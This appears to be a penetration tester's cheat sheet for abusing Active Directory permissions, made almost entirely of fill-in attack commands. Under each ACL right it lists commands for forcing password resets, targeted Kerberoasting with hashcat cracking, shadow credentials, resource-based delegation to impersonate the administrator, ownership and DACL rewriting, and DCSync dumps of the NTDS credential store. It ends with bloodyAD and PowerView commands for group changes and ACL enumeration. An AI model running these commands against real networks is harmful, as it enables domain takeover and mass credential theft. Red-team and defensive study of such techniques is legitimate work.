Skip to main content

ACL

ForceChangePassword

net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host <ip> -d <dc> -u <username> -p <password> set password <target_userename> <new_password>

GenericWrite

targetKerberoasting

python targetedKerberoast.py -v -d <domain> -u <username> -p <password>
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force

shadowCredentials

certipy shadow auto -u username@domain -p <password> -account <target_username> -dc-ip <ip>

Using Kerberos

certipy shadow auto -username username@domain -p <password> -k -account <target_username> -target <dc>

GenericALL

Password Change

net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash

RBCD

rbcd.py -delegate-from '<machine_name>' -delegate-to '<target>' -dc-ip <ip> -action 'write' '<domain>/<username>:<password>'
getST.py -spn 'cifs/<dc>' -impersonate administrator -dc-ip <ip> '<domain>/<machine_name>:<password>'
export KRB5CCNAME=administrator.ccache

WriteOwner

owneredit.py -action write -new-owner <username> -target <group_name> <domain>/<username>:<password>
dacledit.py -action 'write' -rights 'WriteMembers' -principal <username> -target-dn <dn> <domain>/<username>:<password>
python3 pywhisker.py -d <domain> --dc-ip <ip> -u <username> -H :<hashes> --target <target_username> --action "add"
certipy shadow auto -username <username>@<domain> -hashes :<hashes> -account <target_username>

DCSync

secretsdump.py <dc> -k
nxc smb <domain> -u <username> -p <password> --ntds
nxc smb <domain> -k --use-kcache --ntds

Tools

bloodyAD

Adding a user to a group

bloodyAD -d <domain> -u <username> -p <password> --host <dc> add groupMember <group_name> <username>

Giving the user GenericAll

bloodyAD -d <domain> -u <username> -p <password> --host <dc> add genericAll <dn> <username>

Change User Password

bloodyAD -d <domain> -u <username> -p <password> --host <dc> set password <target_username> <new_password>

powerview.py

powerview $domain/$username:'$password'@$domain -k
PV > Get-DomainObjectAcl -Identity ServiceMGMT

PowerView

Find-InterestingDomainACL -ResolveGUIDS | ?{$_.IdentityReferenceName -match "username"}

Or get everything in json format and jq it

Find-InterestingDomainACL -ResolveGUIDS | ConvertTo-Json
cat acls.json | jq ' .[] | select (.IdentityReferenceName == "username")'

Or

cat acls.json | jq '.[]' -c | grep -i username | jq .